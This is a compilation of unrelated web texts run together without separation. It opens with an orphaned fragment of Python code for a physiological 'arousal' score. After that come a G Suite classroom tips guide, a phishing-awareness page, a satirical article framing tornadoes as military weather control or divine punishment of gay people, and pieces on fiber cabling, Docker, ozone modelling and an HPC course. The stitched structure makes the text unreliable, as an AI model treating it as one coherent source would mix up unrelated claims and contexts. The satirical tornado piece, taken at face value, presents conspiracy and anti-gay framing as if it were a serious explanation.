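    """Normalise a signal to zero mean and unit variance."""
    return (signal - signal.mean()) / signal.std()

# A crude combined "arousal" score: minutes where both signals run high together
arousal = (zscore(heart_rate) + zscore(skin_conductance)) / 2
print("flagged minutes:", np.where(arousal > 1.0)[0].tolist())
```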
This guide will teach you to be as tech-savvy as your students. It is meant to acquaint you with G Suite's major features and is loaded with best practices and lots of helpful, actionable tips to optimize your investment in G Suite and improve your students' learning experience. It's appropriate for school IT admins, teachers, principals, and anyone else interested in learning more about G Suite for education. Start implementing these tips today!

Using Gmail, you can easily send messages to students & parents. But you can also combine other G Suite tools with Gmail to get more out of it.
Tip #1 – Use Google Translate to convert emails to & from non-English speaking parents or between your students and international pen pals.*
*Google Translate is not a tool for learning another language, but can help cut the language barrier between people who speak different languages.

Calendar helps keep track of events in an organized way and is accessible to anyone from the desktop or a mobile device. You can use Calendar in the routine way – for activities, homework assignments, and your class schedule. You can also use it to set up shared resource calendars for laptops or the library room.
Tip #2 – Instead of running around the building to find out who has the projector you need, check the master projector Calendar right from your desktop.
Tip #3 – Set up pacing guides for your students, allow parents to remotely schedule parent/teacher meetings, or develop standards mapping.

Google Docs can do everything Word (or any other word processing program) can, but it also allows you to share created documents with anyone else on the system you choose. Group teaching and close communication with students become easier with Docs, as does collaboration among students.
Tip #4 – Take notes at your next school meeting and share them with the other attendees.
Tip #5 – Develop and share collaborative lesson plans with other teachers. Any change made by one of the teachers is instantly available to all the others.
Tip #6 – Develop quizzes and quickly analyze and summarize data from the results.
Tip #7 – Encourage students to work on group projects using Google Docs, so that each student can independently provide their contribution and instantly integrate it into the whole.
Tip #8 – Use shared Docs for student writing assignments to provide quick feedback to help guide them during the process.

Google Spreadsheets doesn't reinvent the Excel wheel. The beauty of it is the same as the other G Suite components: the ability to virtually share your work with anyone with access to the system.
Tip #9 – Set up a simple Spreadsheet for scheduling parent/teacher conferences (if you decide not to use that feature in Calendar). It's preferred over the traditional paper version because parents can access the sheet from their Gmail account, see what slots are available, and select the best time for their meeting.
Tip #10 – Use Spreadsheets to track homework assignments, create student-driven vocabulary flashcards, or perhaps even to help students document their science experiments.

Google Presentations can be just as impressive as PowerPoint but, again, it becomes even more powerful because more than one user can access it. The phenomenon of fumbling through multiple PowerPoint versions is eliminated.
Tip #11 – For group presentations, have students use Google Presentations so they can create their own slides for their portion of the assignment, then instantly integrate them into the master presentation.
The power of remote access is particularly evident in Google Hangouts, where you can connect with anyone remotely in real-time.
Tip #12 – To give your students a different perspective on the topic you're covering, invite a guest lecturer to present via Hangouts.
Tip #13 – For particularly busy parents, conduct parent/teacher conferences over Hangouts.

Google Forms allows you to quickly create a survey or form that can be sent to parents and students to fill out online. You won't have to tabulate results; all the answers are immediately collected in a Google Spreadsheet that can then be shared. Forms can be sent outside your school domain, so you're not limited to just colleagues inside the school. And the results of any Forms project are neatly summarized with charts, graphs, bells, whistles and statistics about all your responses.
Tip #14 – Give a pre-assessment test to your students at the beginning of the year to get an idea of the knowledge level of your class. Then do another assessment at the end of each marking period to see how much progress they've made.
Tip #15 – Do a quick survey on your students' interests and try to tie them into your daily work lessons.
Tip #16 – Encourage your students to read more by setting up a form where they can submit their reading records. For example, they can track how many minutes they read each week.
Tip #17 – Create quizzes with Forms and then automatically grade them by using an Apps script like Flubaroo. (more on scripts below)

Sites is a powerful teaching tool where you can build interactive websites for students to share information and collaborate on documents, videos, schedules, and more.
Tip #18 – Create a Site for your class, including a class calendar with special events and homework assignments. You can add videos and other presentations that tie in with your lesson plans.
Tip #19 – Create a curriculum portal that contains lesson plans and other resources that tie into your day-to-day teaching plan.
Tip #20 – Create e-portfolios for each student. This will allow them to show off their work and develop it from year to year.
Tip #21 – Assign a group project where students need to use Sites to create and consolidate their work.

Google Groups are online forums and email-based groups that encourage community conversation and discussion among peers.
Tip #22 – Create a Group for your entire class, so students can discuss lessons and materials outside of class.
Tip #23 – Create classroom placement Groups so you can distribute different levels of materials and resources appropriate to each student's needs.
Tip #24 – Create a Group for your students' parents so they can easily communicate with each other and share updates and news.

G Suite can also be extended with Apps Scripts, the scripts mentioned in Tip #17. Here are a few:
Doctopus – This is a document management script to use for student projects. It allows you to auto-generate, pre-share, and manage grading and feedback on group and individual projects.
Flubaroo – This script allows you to automatically grade multiple-choice or fill-in-the-blank assignments using Forms. It also computes average assignment scores, average score per question, and highlights low scoring questions. (A rough sketch of this kind of automatic grading appears at the end of this guide.)
gClassFolders – Based on Spreadsheets, this add-on creates class folders for students and teachers.

Blogger allows you to create free blogs, through which students who enjoy blogging can better engage with the subject matter. They can post opinions and questions, and share posts from other students.
Tip #25 – Encourage improved writing skills by having your students use Blogger, but be sure to prohibit text speak like “brb” and “Cu2moro”. Google Moderator allows you to create a series of discussions, and have people submit questions, ideas or suggestions, then vote on various ideas. Tip #26 – Use Moderator to encourage students to think about their daily lessons and read each other’s thoughts on the material. Then have them vote on the best responses, and continue the conversation in class. G Suite for Education is an incredible platform that is revolutionizing the way teachers teach and students learn. Using the power of interactive, cloud-based technology, school administrators and teachers can now connect with students in an enhanced way. Social media, online games and the internet dominate student lives outside the classroom. G Suite for Education allows you to bring that environment into the classroom and make the students’ educational experience more relevant and better mirror their day-to-day lives. It’s a giant leap forward for those who choose to take advantage. Go for it and good luck!
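As a postscript to Tip #17: the kind of automatic grading a script like Flubaroo performs can be sketched in a few lines of Python. This is a hypothetical illustration, not Flubaroo's actual code. It assumes the quiz responses have been downloaded from Forms as a CSV file, and the file name, column headings and answer key below are all made up.

```python
import csv
from collections import Counter

# Hypothetical answer key: question column -> correct answer
ANSWER_KEY = {
    "Q1. Capital of Australia?": "Canberra",
    "Q2. 7 x 8 = ?": "56",
    "Q3. H2O is commonly called?": "water",
}

def grade(responses_csv: str) -> None:
    """Grade a Forms export and print per-student scores and per-question stats."""
    missed = Counter()
    with open(responses_csv, newline="") as f:
        for row in csv.DictReader(f):
            score = 0
            for question, correct in ANSWER_KEY.items():
                if row.get(question, "").strip().lower() == correct.lower():
                    score += 1
                else:
                    missed[question] += 1
            print(f"{row.get('Name', 'unknown')}: {score}/{len(ANSWER_KEY)}")
    print("\nMost-missed questions:")
    for question, count in missed.most_common():
        print(f"  {count} wrong  {question}")

if __name__ == "__main__":
    grade("quiz_responses.csv")   # hypothetical export file name
```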
How do tornadoes form? Here's what the NOAA National Severe Storms Laboratory says:

The truth is that we don't fully understand. The most destructive and deadly tornadoes occur from supercells, which are rotating thunderstorms with a well-defined radar circulation called a mesocyclone. (Supercells can also produce damaging hail, severe non-tornadic winds, unusually frequent lightning, and flash floods.) Tornado formation is believed to be dictated mainly by things which happen on the storm scale, in and around the mesocyclone. Recent theories and results from the VORTEX2 program suggest that once a mesocyclone is underway, tornado development is related to the temperature differences across the edge of downdraft air wrapping around the mesocyclone.

Supercells? Mesocyclones? VORTEX2? What is this, an L. Ron Hubbard novel? Clearly the NSSL should have stopped at, "The truth is that we don't fully understand." But by doing a little online research and measuring scientific metrics such as total page views and "likes," we have narrowed down the true cause of tornadoes to a pair of possibilities. The case for each is presented in the videos below. Which makes more sense to you, or do both explanations pass the "reasonable" test?

This story, "Tornadoes: U.S. military weather control or God's punishment for gays? You decide!" was originally published by Fritterati.
(Unless you didn't enter your info. In which case: good for you.) Don't worry. Your credit card details were not transmitted when you hit the submit button. But don't trust this claim without question. Find a technically-inclined friend to verify it for you. After all, you've already been tricked once.

Unfortunately, not every site on the Internet is trustworthy. Sometimes people will set up websites that appear to be trustworthy, but are actually used to steal your sensitive information. This practice is called phishing. Had this website been set up by less reputable people, your credit card information would have been logged and used fraudulently.

Things you can do to protect yourself:
- Only enter sensitive information on sites you trust. Amazon.com, Barnes & Noble, etc.
- Look at the address bar. Just because a website looks like Amazon.com, that doesn't mean it is Amazon.com. Make sure the address bar shows the domain name you expect. A common phishing trick is to have a domain like amazon.com.not.ru, which steals your credentials when you try to log in. The actual domain in this example is "not.ru," but people often only check to see if "amazon.com" is anywhere in the address bar. (See the short sketch at the end of this page.)
- E-mails from phishers are usually addressed to a generic user. At best they will have your e-mail address in them. Real e-mails from websites you use will contain more substantial information about you. For example, Paypal has a policy of always putting your Paypal username in correspondence.
- If asked for your password by e-mail or phone, do not give it out. The only place you should enter your password is a login form.
- Do not use a debit card for online commerce. In the United States, debit card fraud is much more harmful than credit card fraud. For credit cards, you have a longer period of time in which you can flag a purchase as fraudulent. Also, a credit card is billed to you, while a debit card purchase immediately takes money out of your checking account.

You can learn more at the Anti-Phishing Working Group's website. Note: ismycreditcardstolen.com is not in any way affiliated with the Anti-Phishing Working Group.
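The address-bar check described above can be automated. Below is a minimal Python sketch of the registered-domain comparison that catches tricks like amazon.com.not.ru. The URLs and the expected domain are illustrative, and the two-label heuristic is deliberately simplistic; real code should consult the Public Suffix List (for example via the tldextract package) so that domains such as example.co.uk are handled correctly.

```python
from urllib.parse import urlparse

def registered_domain(url: str) -> str:
    """Very rough guess at the registrable domain (last two labels).
    Production code should use the Public Suffix List instead."""
    host = urlparse(url).hostname or ""
    return ".".join(host.split(".")[-2:])

def looks_like(url: str, expected: str) -> bool:
    """True only if the URL's registered domain matches the one we expect."""
    return registered_domain(url) == expected.lower()

for url in (
    "https://www.amazon.com/gp/cart",           # genuine
    "https://amazon.com.not.ru/login",          # phishing: real domain is not.ru
    "https://secure-amazon.com.evil.example/",  # phishing: real domain is evil.example
):
    print(f"{url}  ->  {'OK' if looks_like(url, 'amazon.com') else 'SUSPICIOUS'}")
```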
The vision of electric cars calls for charge stations to perform smart charging as part of a global smart grid. As a result, a charge station is a sophisticated computer that communicates with the electric grid on one side and the car on the other. To make matters worse, it's installed outside on street corners and in parking lots. Electric vehicle charging stations bring with them new security challenges similar to those found in SCADA systems, even if they use different technologies. In this video recorded at Hack In The Box 2013 Amsterdam, Ofer Shezaf, founder of OWASP Israel, talks about what charge stations really are, why they have to be "smart" and the potential risks to the grid, to the car and, most importantly, to its owner's privacy and safety.
Next role for robots: data center diagnosticians

The U.S. Department of Energy last month opened the Energy Systems Integration Facility, a $135 million research center designed to test how power grids, data centers and other IT systems can be made more energy-efficient. In fact, the center itself, located in Golden, Colo., might be the most energy-efficient data center in the world. One of the systems on its research plan might include the use of robots for energy management and conservation. Recently IBM and EMC developed robots designed to rove data centers and collect temperature, power usage and other data that could affect the performance of data center IT systems.

Cooling alone can account for 60 to 70 percent of data center power costs, according to EMC officials, liabilities that can mount up as organizations buy more capacity than needed and overcool their systems. Around 85 percent of data centers also mismanage the provisioning of infrastructure, which increases energy consumption, according to EMC officials. The EMC Data Center Robot helps combat these problems by patrolling for temperature fluctuations, humidity and system vibrations and locating sources of cooling leaks and other vulnerabilities. EMC's DC Robot collects data via digital sensors and sends it through a Wi-Fi connection for processing. An algorithm converts the temperature data into a thermal map, which can be used to identify anomalous hot and cold spots in data center aisles. (A rough sketch of this kind of mapping appears at the end of this post.) Most data centers use a set of fixed sensors to manage temperatures and other energy consumption indicators, an expense that can run into the millions of dollars – "low hanging fruit" that helped justify their investment in the DC Robot, say EMC officials.

While the DC Robot was one of the first data center energy-focused robots, IBM has developed a similar model, which it offers as part of an energy management troubleshooting service. The firm's Measurement and Management Technologies unit will use the robo-tool to create a "robotic cooling assessment": three-dimensional temperature and humidity maps to help organizations identify energy sinks and other problem spots in their data centers. The assessment determines a data center's baseline and high-level cooling capacity.

A third energy diagnostics tool, from Purkay Labs, is a simple portable unit that checks energy-environment data for short or long term intervals. The unit consists of an adjustable carbon fiber rod that measures the air quality at three different heights. The unit is not mobile, and so technically not a robot. "It's a product that we've developed so you can get the temp across the entire aisle," said CEO Indra Purkayastha.

Posted by GCN Staff on Aug 30, 2013 at 11:31 AM
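EMC has not published its algorithm, but the general shape of turning roving temperature readings into a thermal map and flagging anomalies can be sketched quickly. Everything below (the grid size, the readings and the three-degree threshold) is invented for illustration.

```python
import numpy as np

# Illustrative (x, y, temperature in deg C) readings a roving sensor might log
readings = [
    (0, 0, 21.5), (0, 5, 22.0), (5, 0, 23.1),
    (5, 5, 31.4),              # suspicious hot spot
    (10, 0, 22.3), (10, 5, 22.8),
]

# Accumulate readings into a coarse grid (nearest-cell binning, 5 m cells)
grid_sum = np.zeros((3, 2))
grid_cnt = np.zeros((3, 2))
for x, y, temp in readings:
    i, j = x // 5, y // 5
    grid_sum[i, j] += temp
    grid_cnt[i, j] += 1
thermal_map = grid_sum / np.maximum(grid_cnt, 1)

# Flag cells that deviate sharply from the room-wide mean
mean = thermal_map[grid_cnt > 0].mean()
for (i, j), t in np.ndenumerate(thermal_map):
    if grid_cnt[i, j] and abs(t - mean) > 3:
        print(f"anomaly at aisle cell ({i}, {j}): {t:.1f} C vs mean {mean:.1f} C")
```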
Black Box Explains... 50-micron vs. 62.5-micron fiber optic cable

As today's networks expand, the demand for more bandwidth and greater distances increases. Gigabit Ethernet and the emerging 10 Gigabit Ethernet are becoming the applications of choice for current and future networking needs. Thus, there is a renewed interest in 50-micron fiber optic cable. First used in 1976, 50-micron cable has not experienced the widespread use in North America that 62.5-micron cable has. To support campus backbones and horizontal runs over 10-Mbps Ethernet, 62.5 fiber, introduced in 1986, was and still is the predominant fiber optic cable because it offers high bandwidth and long distance.

One reason 50-micron cable did not gain widespread use was because of the light source. Both 62.5 and 50-micron fiber cable can use either LED or laser light sources. But in the 1980s and 1990s, LED light sources were common. Since 50-micron cable has a smaller aperture, the lower power of the LED light source caused a reduction in the power budget compared to 62.5-micron cable—thus, the migration to 62.5-micron cable. At that time, laser light sources were not highly developed and were rarely used with 50-micron cable—mostly in research and technological applications.

The cables share many characteristics. Although 50-micron fiber cable features a smaller core, which is the light-carrying portion of the fiber, both 50- and 62.5-micron cable use the same glass cladding diameter of 125 microns. Because they have the same outer diameter, they're equally strong and are handled in the same way. In addition, both types of cable are included in the TIA/EIA 568-B.3 standards for structured cabling and connectivity. As with 62.5-micron cable, you can use 50-micron fiber in all types of applications: Ethernet, FDDI, 155-Mbps ATM, Token Ring, Fast Ethernet, and Gigabit Ethernet. It is recommended for all premise applications: backbone, horizontal, and intrabuilding connections, and it should be considered especially for any new construction and installations. IT managers looking at the possibility of 10 Gigabit Ethernet and future scalability will get what they need with 50-micron cable.

The big difference between 50-micron and 62.5-micron cable is in bandwidth. The smaller 50-micron core provides a higher 850-nm bandwidth, making it ideal for inter/intrabuilding connections. 50-micron cable features three times the bandwidth of standard 62.5-micron cable. At 850-nm, 50-micron cable is rated at 500 MHz/km over 500 meters versus 160 MHz/km for 62.5-micron cable over 220 meters.

Fiber Type     Minimum Bandwidth (MHz-km)     Distance at 850 nm     Distance at 1310 nm
62.5/125 µm    160/500                        220 m                  500 m
50/125 µm      500/500                        500 m                  500 m

As we move towards Gigabit Ethernet, the 850-nm wavelength is gaining importance along with the development of improved laser technology. Today, a lower-cost 850-nm laser, the Vertical-Cavity Surface-Emitting Laser (VCSEL), is becoming more available for networking. This is particularly important because Gigabit Ethernet specifies a laser light source.

Other differences between the two types of cable include distance and speed. The bandwidth an application needs depends on the data transmission rate. Usually, data rates are inversely proportional to distance. As the data rate (MHz) goes up, the distance that rate can be sustained goes down. So a higher fiber bandwidth enables you to transmit at a faster rate or for longer distances.
In short, 50-micron cable provides longer link lengths and/or higher speeds in the 850-nm wavelength. For example, the proposed link length for 50-micron cable is 500 meters in contrast with 220 meters for 62.5-micron cable. Standards now exist that cover the migration of 10-Mbps to 100-Mbps or 1 Gigabit Ethernet at the 850-nm wavelength. The most logical solution for upgrades lies in the connectivity hardware. The easiest way to connect the two types of fiber in a network is through a switch or other networking “box.“ It is not recommended to connect the two types of fiber directly.
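The bandwidth ratings above are modal bandwidth-distance products (MHz-km), so a first-order way to see the rate-versus-distance trade-off is to divide that product by the signal bandwidth you need. The sketch below does exactly that. The signal bandwidths chosen are purely illustrative, and real standards such as Gigabit Ethernet apply additional dispersion and loss penalties, which is why their specified distances are shorter than this naive estimate.

```python
def estimated_reach_m(modal_bw_mhz_km: float, signal_bw_mhz: float) -> float:
    """Naive estimate from the bandwidth-distance product: km = (MHz-km) / MHz."""
    return modal_bw_mhz_km / signal_bw_mhz * 1000.0

FIBERS_850NM = {"62.5/125 um": 160.0, "50/125 um": 500.0}   # MHz-km, from the table above

for signal_bw in (100.0, 500.0, 1000.0):     # illustrative signal bandwidths in MHz
    for fiber, modal_bw in FIBERS_850NM.items():
        reach = estimated_reach_m(modal_bw, signal_bw)
        print(f"{fiber} at {signal_bw:.0f} MHz: roughly {reach:.0f} m")
```

The point of the exercise is simply that, for any given rate, the 50-micron fiber's higher bandwidth-distance product buys roughly three times the reach at 850 nm.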
A research area of mathematics is being used to simplify spreadsheet formulas by providing users with a library of downloadable spreadsheet components. Oxford researcher and consultant Jocelyn Paine has set up a Web-based software library for Excel users called the Ireson-Paine Spreadsheet Parts Repository, which will stock modules for users to download and "glue" into their own spreadsheets. These will do calculations that users find difficult or risky to program themselves. Paine wants suggestions for suitable modules. The idea is based on "category theory", which takes mathematical ideas such as "sum" - putting things together - and abstracts them into universal concepts applicable to diverse situations. Computer scientists can use this concept to formalise what happens when the modules are strung together to make programs.
Copy wide characters from one buffer to another

Synopsis:
#include <wchar.h>
wchar_t * wmemmove( wchar_t * ws1, const wchar_t * ws2, size_t n );

Arguments:
ws1 - A pointer to where you want the function to copy the data.
ws2 - A pointer to the buffer that you want to copy data from.
n - The number of wide characters to copy.

Library:
Use the -l c option to qcc to link against this library. This library is usually included automatically.

Description:
The wmemmove() function copies n wide characters from the buffer pointed to by ws2 to the buffer pointed to by ws1. This function copies overlapping regions safely. The wmemmove() function is locale-independent and treats all wchar_t values identically, even if they're null or invalid characters. Use wmemcpy() for greater speed when copying buffers that don't overlap.

Returns:
A pointer to the destination buffer (i.e., the same pointer as ws1).

Last modified: 2014-06-24
A long time ago, a computer program was a stack of punch cards, and moving the program from computer to computer was easy as long as you didn't drop the box. Every command, instruction, and subroutine was in one big, fat deck. Editors, compilers, and code repositories have liberated us from punch cards, but somehow deploying software has grown more complicated. Moving a program from the coding geniuses to the production team is fraught with errors, glitches, and hassles. There's always some misconfiguration, and it's never as simple as carrying that deck down the hall. Into this world comes open source Docker, the latest layer of virtualization to bundle everything together in a stable package or, in the current parlance, "container." (If the computer industry ever runs out of synonyms for "box," we're in big trouble.) The software opens up the process of creating and building virtual machines to anyone who can work with the Linux command line. You put the instructions for starting up your machine in one file called the Dockerfile, issue the build command, and voilà, your new machine is running in its own Shangri-La or Private Idaho or La-La Land. (Choose your own metaphor.) If you take the right steps down the path to creating a Dockerfile, the results can be incredible. I whipped up a few virtual machines in a few minutes, and the building and deploying process was lightning quick. Anyone who has waited for other virtualization layers to start up will be surprised by how quickly you can type docker run and watch the virtual machine spring to life. This might be because Docker containers are typically more lightweight than traditional virtual machines. I suspect it might also be because everything runs from the command line. There are no mouse clicks to distract Docker. It's all about communicating with other machines through shell scripts, not those pesky humans who need cute icons in their GUIs. Life with Docker is tightly integrated with the Linux command line. Docker depends entirely upon the hooks for containers in the newer versions of the Linux kernel, which allow isolated bundles of apps, services, and the libraries they depend on to live side by side on the Linux host. The Linux kernel team did most of the clever work, and now Docker is making it easy for people to access the power. The simplest way to use it is with a newer version of Ubuntu (say, 12.04) or one of the close cousins. There are instructions for using Docker with Mac OS X or Windows, but they involve installing VirtualBox and running the Linux kernel in a virtual machine. Docker containers are built out of text written in the Dockerfile, the equivalent of the make file. There's not much to the syntax. Most of the lines in a Dockerfile will begin with RUN, which passes the rest of the line to the instance inside the container. These are usually lines that say things like RUN sudo apt-get install.... Much of the code in the Dockerfile is a shell script for building your machine and installing the software you need. The real action occurs when you start playing with the other commands that poke holes in the container's flexible layer. The command ADD . /src maps your current directory and makes it appear inside the container as the directory src. I used it to put some Web pages for the version of Node.js I fired up inside a container. My Web page appeared to be both outside and inside the virtual world at the same time, but it seems like this is an illusion. Docker is really zipping up your files and passing a copy. 
You will also poke holes in the container for the TCP/IP ports, mapping the ports of the existing machine to the ports inside the container. Two clever tricks start the moment when you ask Docker to build the machine. First, you can start accessing previously built containers from Docker's repositories. Most of the standard distros are there, as well as a number of common configurations with tools like MongoDB. You can ADD these slices to your Dockerfile and they'll be downloaded to your new machine. The basic repository is public, but the company behind the Docker project is looking into building private repositories for enterprise work. The second is the way the new machine is built up with slices, much like a coldcut sandwich. Docker is clever enough to keep the changes in layers, potentially saving space and complexity. The changes you make are stored separately as diffs between the containers. These diffs are also mobile, and it's possible to juggle them to deploy your software. Your developers create the container with all the right libraries, then hand it over to the ops staff, which treats it like a little box that just needs to run. For all of the cleverness, though, it's important to recognize that the software is very new and some parts are being redesigned as I type this. The Docker website says, "Please note Docker is currently under heavy development. It should not be used in production (yet)." The project plans to have an official release of a new version each month. It also notes that the current master branch of the open repository is the current release candidate. You can get it and build it yourself. From what I saw, Docker is far enough along to be used in lightweight projects that don't overstress the machine or risk damage if something fails. Many report issues with stuck containers and "ghosts" that clog up machines. These can be swept away by restarting everything, a bit of a pain that undermines one of the selling points of the lightning-quick layer of virtualization. The bigger danger for you is that the Docker team will revise the API or add a new feature that trashes your hard work. This is bound to happen because I already stumbled upon several deprecated commands. The development team is also starting to tackle the growing pains that emerge when a project goes from a fun experiment for hackers to a serious part of infrastructure. Docker just announced a new "responsible security" program to help people report holes. While the Docker sandbox may stop some security leaks, it is quite new and relatively untested. Is there a way for one Docker container to reach inside another running next door? It's certainly not part of the official API, but these are untested waters. I wouldn't trust my bitcoin password at Mt. Gox to a Docker container. Some of these qualms might be eased by the company's decision to open-source the code under the generous Apache 2.0 license. Developers can see the code and -- if they have the time -- look for the kind of holes that should be patched. The company wants to encourage non-employees to contribute, so it's working to broaden the team of developers to extend outside the company. This is paying off in a burgeoning community of startups that want to add something to the Docker ecosystem. Companies like Tutum, Orchard, and StackDock, for instance, let you build up your Dockerfile interactively in a browser. When it's done, you push a button, and it's deployed to their cloud at prices that begin at $5 per month for 1GB of RAM. 
There are others like Quay.io, which offers to host your Docker repositories, and Serf, a service discovery and orchestration tool that will help Docker containers learn about one another. There are also plenty of other, more established corners of the devops world, including Chef and Puppet, that are taking notice and adapting to the new opportunity to let users build Dockerfiles. This list of names will probably change by the time you read this because it's one of the most exciting segments of a very dynamic world. There will be plenty of mergers, flameouts, and new startups in this area. These startups show the promise of the technology. StackDock, for instance, lets you assemble your machine from a few standard cards. These will be kept cached locally, and all the machines will start with the same OS and kernel for now. This can dramatically reduce the memory devoted to keeping the same copy of the OS for all of the instances. Build once, run anywhere Several people I've spoken with sounded a bit leery when hearing there was another virtual machine solution promising to make code that runs almost anywhere. They've lived through the interest in Pascal, Java, and the rest. The difference is that Docker is much more narrowly focused on packaging the Linux machines that act as the backbone of the Internet. There are no pretenses of taking over the desktop or any other part of the computing world. Docker doesn't want to translate some neutral byte code into local binaries. It wants to package x86 code that works with the Linux kernel. These are simpler goals. Docker began as a tool to help the developer package up a Linux application, and even after all the hype, it remains just that: a container-building tool that works efficiently and cleverly. Will it sweep through data centers? Many Linux developers will love it. They'll be able to build up nice machines on their desk and ship them off to the cloud without having to waste extra time figuring out how to reconfigure their cloud. Docker shifts the focus to the most important part of the equation: the app. Instead of buying multiple machine instances, they'll be buying compute time. It's entirely possible that many of the clouds will morph into farms for running Docker containers. There's no doubt that the ease and simplicity of Docker mean that many will start incorporating it into their stacks. It will become one of the preferred ways to ship around code. But for all of its promise, I still feel like everything is a bit too new. Toward the end of the process, I started wondering about this entire operation. It's wholly possible to put a Docker container inside a Vagrant or VirtualBox VM that is sitting on the operating system. If this is a cloud machine, the operating system itself could be sitting on some hypervisor. There's plenty of virtualization going on. If it were a thriller mystery, the protagonist would be peeling off masks again and again and again. At its root, Docker is solving a problem caused by a failure of operating system design. The old ideas of isolating users and jobs in an operating system aren't good enough. Somehow the developers and the staff need another, more powerful force field to stop the software from messing with each package. The success of Docker is one step toward this redesign, but it's clearly more of a Band-Aid than the kind of unifying vision that the operating system world needs. 
Who knows when this newer, better, and cleaner model will emerge, but until it does, Docker is one of the simplest ways of using some virtual duct tape to wall off the applications from each other. The issues with ghosts and disk space will be solved. The tool will become less command-line driven. Anyone building software to run in production on Linux boxes will love the flexibility it brings, and that will drive plenty of interest over the next five years.
Remember learning about ozone? It was easy to relate to that distinctive smell that signaled the onset of precipitation. Even the chemical formula had a simple elegance, O3. We learned that a layer of these triatomic molecules created a protective buffer way up in the earth's atmosphere, and that this layer filters out up to 99 percent of the sun's harmful UV radiation, which would otherwise cause DNA damage in humans and animals. Ozone has a bit of a dual nature, however: a life-sustaining substance at higher altitudes becomes an air pollutant when it occurs at ground level. And at higher concentrations, it can cause serious health problems.

Scientists had already established that ozone concentrations, both in the atmosphere and on the earth's surface, are linked to meteorological conditions, like temperature and prevailing winds, so perhaps long-term climate patterns would have a role to play as well. Eleni Katragkou, a climate scientist at Aristotle University of Thessaloniki (AUTh) in Greece, decided to test this hypothesis. She wanted "to predict ozone behaviour in a changing climate, in order to be able to assess the impacts on air quality, human health, agricultural production and ecosystems."

"People with lung diseases, children, older adults, and people who are active outdoors may be particularly sensitive to ozone," Katragkou explained. "[Ozone] also affects sensitive vegetation and can damage crop production and ecosystems."

Using the grid computing resources of the AUTh computing centre (an EGI site), Katragkou's team performed a series of regional climate-air quality simulations for two future decades (2041–2050 and 2091–2100) and one control decade (1991-2000) to study the impact of climate change on surface ozone in Europe. The simulations relied on an established emissions scenario, called A1B, developed by the Intergovernmental Panel on Climate Change (IPCC). The conclusions, published in the Journal of Geophysical Research, indicate that levels of ground-level ozone are set to increase near the end of the century, with the highest concentrations expected for south-west Europe.

The grid resources were crucial for the accuracy of the model, and allowed the simulations to be done in a reasonable time frame. Performed on a single desktop computer, the same job would have taken 40 years to complete. "The usual bottleneck for performing those types of simulations at a finer resolution is the huge demands on CPU time. This makes me think that grid computing may facilitate very much our future work in this direction," Katragkou stated.
Data scientists and those adept at scientific computing are numerous, but not quite numerous enough to meet the demands of the computing marketplace. Further, as science progresses to more complex and data-intensive questions, such as researching the beginning of the universe or getting more in-depth genomic results, it becomes imperative for more scientists and researchers to learn these HPC techniques to cut down on query times. Randall J. Leveque, Professor of Applied Mathematics and Adjunct Professor of Mathematics at the University of Washington in Seattle, will be conducting a free course that brings the principles of parallelism in high performance computers to the people who are running applications on multi-processor laptops and desktops or on cloud services. Leveque’s principle is that a person’s time is more valuable than a computer’s time. As such, any research query or scientific question that you can parallelize on your computer’s multiple processors or via a cloud server is a benefit. However, a fast program is of course useless if that program produces inaccurate results. “The goal is not to teach the most advanced techniques with supercomputers, but rather techniques that you can use immediately on your own laptop, desktop, cluster, or even in the cloud,” Leveque remarked in his introductory video below. The ten week course, which will require ten to twelve work hours per week, will cover both serial and parallel computing and the computing languages that dictate them, such as Fortran 90, OpenMP, MPI, and Python. The full list of what it is to be covered is below: - Working at the command line in Unix-like shells (e.g. Linux or a Mac OSX terminal). - Version control systems, particularly git, and the use of Github and Bitbucket repositories. - Work habits for documentation of your code and reproducibility of your results. - Interactive Python using IPython, and the IPython Notebook. - Python scripting and its uses in scientific computing. - Subtleties of computer arithmetic that can affect program correctness. - How numbers are stored: binary vs. ASCII representations, efficient I/O. - Fortran 90, a compiled language that is widely used in scientific computing. - Makefiles for building software and checking dependencies. - The high cost of data communication. Registers, cache, main memory, and how this memory hierarchy affects code performance. - OpenMP on top of Fortran for parallel programming of shared memory computers, such as a multicore laptop. - MPI on top of Fortran for distributed memory parallel programming, such as on a cluster. - Parallel computing in IPython. - Debuggers, unit tests, regression tests, verification and validation of computer codes. - Graphics and visualization of computational results using Python. The course, which again is free to participate in, is scheduled to start on May 1st.
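The parallel-computing topics listed above can be previewed on any multicore laptop without waiting for the course. Below is a minimal, illustrative Python sketch of the kind of task-level parallelism it covers, a Monte Carlo estimate of pi split across worker processes; the sample count and worker count are arbitrary.

```python
import random
from multiprocessing import Pool

def count_hits(samples: int) -> int:
    """Count random points that fall inside the unit quarter-circle."""
    hits = 0
    for _ in range(samples):
        x, y = random.random(), random.random()
        if x * x + y * y <= 1.0:
            hits += 1
    return hits

if __name__ == "__main__":
    total, workers = 4_000_000, 4
    with Pool(workers) as pool:
        # Split the work into equal chunks and run them on separate cores
        hits = sum(pool.map(count_hits, [total // workers] * workers))
    print(f"pi is approximately {4 * hits / total:.4f}")
```

The same decomposition idea carries over to OpenMP and MPI, which the course teaches on top of Fortran.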
A fiber cross connect patch panel, also known as a fiber distribution panel, is used to terminate fiber optic cable and provide access to the cable's individual fibers for cross connection, and it commonly serves as a fiber optic management unit. It helps network technicians minimize the clutter of wires when setting up fiber optic cables, and organize and distribute the optical cables and their branches. Panels are also used to secure the splice units and connectors.

Benefit From Fiber Patch Panels

Fiber optic patch panels can accommodate connector panels, connectors, fiber optic patch cords, associated trunk cables, and usually come with cable management. With the use of fiber optic patch cables, network technicians can easily connect cable fibers via cross connection, test the patch panel, and connect it to lightwave equipment. These patch panels are also used as a link demarcation point and in labeling the cable's individual fibers.

Fiber patch panels provide a convenient way to rearrange fiber cable connections and circuits. A simple patch panel is a metal frame containing bushings in which fiber optic cable connectors plug in on either side. One side of the panel is usually fixed, meaning that the fiber cables are not intended to be disconnected. On the other side of the panel, fiber cables can be connected and disconnected to arrange the circuits as required.

A fiber optic patch panel is a built-in unit for fiber optics management. It has the appearance of a box enclosure. However, it does more than just serve as protection for several sets of fibers being used for communications. It can also serve as a mechanism with which you can handle the fibers easily and conveniently to serve your purpose. It is here that you can route fiber optic cables, add connections, or shut off connections, just as an ordinary junction box does for your electrical wires. With telephone companies, cable TV and Internet service providers now using fiber optics to deliver services to your home, you may find it necessary to install one of these in your home.

Components Of Fiber Patch Panel

